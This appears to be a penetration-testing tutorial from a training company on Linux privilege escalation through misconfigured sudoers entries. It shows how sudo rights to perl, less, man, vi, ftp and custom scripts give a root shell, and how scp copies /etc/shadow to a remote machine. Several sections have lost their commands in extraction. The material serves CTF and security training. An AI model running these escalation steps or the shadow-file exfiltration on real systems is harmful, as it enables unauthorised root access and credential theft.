Abusing Sudo
Abusing Sudo
Introduction ........................................................................................... 3
Sudoer File Syntax .................................................................................. 4
Traditional Method to assign Root Privilege ......................................... 5
Spawn Root Access ................................................................................. 6
Default Method to assign Root Privilege ............................................... 7
Spawn Root Access ................................................................................. 8
Allow Root Privilege to Binary commands............................................. 9
Spawn Root Access using Find Command ............................................ 10
Allow Root Privilege to Binary Programs ............................................. 11
Spawn shell using Perl .......................................................................... 11
Spawn shell using Python..................................................................... 12
Spawn shell using Less Command ........................................................ 12
Spawn shell using AWK ........................................................................ 13
Spawn shell using Man Command (Manual page)............................... 14
Spawn shell using Vi-editor (Visual editor) .......................................... 15
Allow Root Privilege to Shell Script ...................................................... 17
Spawn root shell by Executing Bash script ........................................... 19
Spawn root shell by Executing Python script ....................................... 19
Spawn root shell by Executing C Language script ................................ 20
Allow Sudo Right to other Programs ................................................... 20
Spawn Shell Using Env ......................................................................... 21
Spawn Shell Using FTP.......................................................................... 22
Spawn Shell Using Socat ...................................................................... 22
Spawn shell through SCP ...................................................................... 23
Page 2 of 23
Introduction
We've talked about Linux Privilege Escalation with SUID Binaries and the /etc/passwd file, and today we'll
talk about "Linux Privilege Escalation using Sudoers file." We always check root permissions for any user
to execute any file or command while completing CTF challenges for privilege escalation by using the sudo
-l command. You may learn about how we used this approach for privilege escalation.
A sudoers file in /etc is the configuration file for sudo rights in Linux and Unix. We've all heard of the sudo
command, which stands for Super User Do Root Privilege Task. The sudoers file stores the users and
groups that have root capabilities and can perform some or all commands as root or another user. Take a
look at the image below.
When you use sudo to run a command that requires root capabilities, Linux checks the sudoers file for
that specific account. And it came to the conclusion that the particular username is in the list of sudoers
files or not; if it isn't, you won't be able to use the sudo command to launch the command or program.
According to sudo permissions, the root user can perform ALL commands from ALL terminals while
masquerading as ALL users: ALL groups.
Page 3 of 23
Sudoer File Syntax
If you (the root user) want to grant sudo access to a specific user, use the visudo command to edit the
sudoers file. Under "user privilege specification," you'll see the usual root permission "root ALL=(ALL:ALL)
ALL," but there's also the Tag option, which is optional, as shown in the image below.
Consider the given example where we want to assign sudo rights to user:raaz to access the terminal and
run the copy command with root privileges. Here, the NOPASSWD tag means no password will be
requested for the user.
NOTE:
Let’s Begin!!
Let’s get in deep through practical work. First, create a user that should not be the sudo group user. We've
added the user "raaz," whose UID is 1002 and GID is 1002, making raaz a non-root user.
adduser raaz
Page 4 of 23
Traditional Method to assign Root Privilege
If the system administrator wants to grant all permissions to user raaz, he can do so by adding user raaz
to the User Privilege Specification category as shown below.
visudo
raaz ALL=(ALL:ALL) ALL
or
raaz ALL=(ALL) ALL
Page 5 of 23
Spawn Root Access
On the other hand, start your attacking machine and first compromise the target system, and then move
to the privilege escalation phase. Suppose you successfully log into the victim’s machine through SSH and
want to know the sudo rights for the current user, then execute the below command. In the traditional
method, the PASSWD option is enabled for user authentication while executing the above command, and
it can be disabled by using the NOPASSWD tag. The highlighted text indicates that the current user is
authorized to execute all commands. Therefore, we have obtained root access by executing the command.
ssh [email protected]
sudo -l
sudo su
id
Page 6 of 23
Default Method to assign Root Privilege
If the system administrator wants to give root permission to user raaz to execute all commands and
programs, then he can follow the below steps to add user raaz under the User Privilege Specification
category.
visudo
raaz ALL=ALL
or
raaz ALL=(root) ALL
Page 7 of 23
Spawn Root Access
Again, compromise the target system and then move to the privilege escalation stage as done above, and
execute the below command to view the sudo user list.
ssh [email protected]
sudo -l
The highlighted text indicates that the user Raaz has the ability to run all commands as the root user.
Therefore, we can achieve root access by performing further steps.
sudo su
or
sudo bash
Note: Above both methods will ask user’s password for authentication at the time of execution of the
sudo -l command because by Default PASSWD option is enabled.
Page 8 of 23
Allow Root Privilege to Binary commands
The user may be given permission to run any file or command in a specific directory, such as /bin/cp,
/bin/cat, or /usr/bin/ find. This sort of permission results in privilege escalation for root access, and it can
be set up using the procedures below:
NOTE: Here NOPASSWD tag that means no password will be requested for the authentication while
running sudo -l command.
Page 9 of 23
Spawn Root Access using Find Command
Again, compromised the victim’s system and then moved to the privilege escalation phase and executed
the below command to view the sudo user list.
sudo -l
At this point, you can notice the highlighted text is indicating that the user Raaz can run any command
through the find command. Therefore, we got root access by executing the below commands.
Page 10 of 23
Allow Root Privilege to Binary Programs
Sometimes admins assign delicate authority to a particular user to run binary programs that allow a user
to edit any system files, such as /etc/passwd, and so on. There are certain binary programs that can lead
to privilege escalation if authorized by a user. In the given below command, we have assigned sudo rights
to the following program, which can be run as a root user.
sudo -l
The highlighted text now indicates that the user Raaz has the ability to run Perl language programs or
scripts as the root user. Therefore, we got root access by executing a Perl one-liner.
Page 11 of 23
sudo perl -e 'exec "/bin/bash";'
id
sudo -l
At this point, you can see that the highlighted text indicates that the user raaz has the ability to run Python
language programs or scripts as the root user. Thus, we acquired root access by executing a Python one-
liner.
sudo -l
Page 12 of 23
Here you can observe the highlighted text, which indicates that the user raaz can run fewer commands as
a root user. Hence, we obtained root access by executing the following.
It will open the requested system file for editing, BUT for spawning root shell type !bash as shown below
and hit enter.
You will get root access as shown in the below image.
sudo -l
At this point, you'll notice that the highlighted text indicates that the user raaz has the ability to run an
AWK language program or script as root. Therefore, we obtained root access by executing an AWK one-
liner.
Page 13 of 23
Spawn shell using Man Command (Manual page)
For privilege escalation, execute the below command to view the sudo user list.
sudo -l
The highlighted text indicates that the user raaz has the ability to run the man command as root.
Therefore, we got root access by executing the following.
It will be displaying Linux manual pages for editing, BUT for spawning root shell type !bash as presented
below and hit enter, you get root access as done above using Less command.
Page 14 of 23
You will get root access as shown in the below image.
id
whoami
sudo -l
Here you can observe the highlighted text, which indicates that user raaz can run the vi command as root
user. Consequently, we got root access by executing the following.
sudo vi
Page 15 of 23
Thus, It will open vi editors for editing, BUT for spawning root shell type !bash as shown below and hit
enter, you get root access as done above using Less command.
sudo vi
id
whoami
NOTE: sudo permission for less, nano, man, vi, and man is very dangerous as they allow the user to edit
system files and lead to Privilege Escalation.
Page 16 of 23
Allow Root Privilege to Shell Script
There is a maximum chance of getting any kind of script for the system or program call. It can be any
script, either Bash, PHP, Python, or C language script. Suppose you (system admin) want to give sudo
permission to any script that will provide a bash shell on execution.
For example, we have some scripts which will provide a root terminal on execution. In the given below
image, you can observe that we have written three programs for obtaining a bash shell by using different
programming languages and saving all three files: asroot.py, asroot.sh, and asroot.c (compiled file shell)
inside bin/script.
NOTE: While solving OSCP challenges, you will find that some scripts are hidden by the author to exploit
kernels or root shells and set sudo permission to any particular user to execute that script.
cat asroot.py
cat asroot.sh
cat asroot.c
gcc asroot.c -o shell
chmod 777 shell
ls
Page 17 of 23
Now allow raaz to run all the above scripts as a root user by editing the sudoers file with the help of the
following command.
Page 18 of 23
Spawn root shell by Executing Bash script
For the privilege, the escalation phase executes the below command to view the sudo user list.
sudo -l
The highlighted text is indicating that the user raaz can run asroot.sh as the root user. Therefore, we got
root access by running asroot.sh script.
sudo /bin/script/asroot.sh
id
sudo -l
Page 19 of 23
At this time, the highlighted text shows that user raaz can run asroot.py as the root user. Therefore, we
acquired root access by executing the following script.
sudo /bin/script/asroot.py
id
sudo -l
Here you can perceive that the highlighted text is indicating that the user raaz can run the shell (asroot.c
compiled file) as the root user. So, we obtained root access by executing the following shell:
sudo /bin/script/shell
id
Page 20 of 23
such as FTP or Socat. In the given below command, we have assigned sudo rights to the following program,
which can be run as a root user.
sudo -l
As we can observe, user: raaz has sudo rights for env, FTP, SCP, and Socat. Let’s try to get root access
through them one-by-one.
Page 21 of 23
Spawn Shell Using FTP
Now let’s try to get root access through FTP with the help of the following commands:
sudo ftp
whoami
or
! /bin/sh
id
whoami
Then run the following command on the victim’s machine and you will get root access on your attacker's
machine.
Page 22 of 23
Spawn shell through SCP
As we know, sudo right is available for SCP, but it is not possible to get the bash shell directory as shown
above because it is a means of securely moving any files between a local host and a remote host.
Therefore, we can use it for transferring those system files which require root permission to perform read
and write operations, such as /etc/passwd and /etc/shadow files.
Syntax: scp SourceFile user@host:~/path of the directory
Now let’s confirm the transformation by inspecting the remote directory and as you can observe we have
successfully received passwd and shadow files in our remote pc.
ls
cat shadow
Page 23 of 23
JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER
Network Pentest
Wireless Pentest
ADVANCED
Advanced CTF
Android Pentest Metasploit
EXPERT
Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment
www.ignitetechnologies.in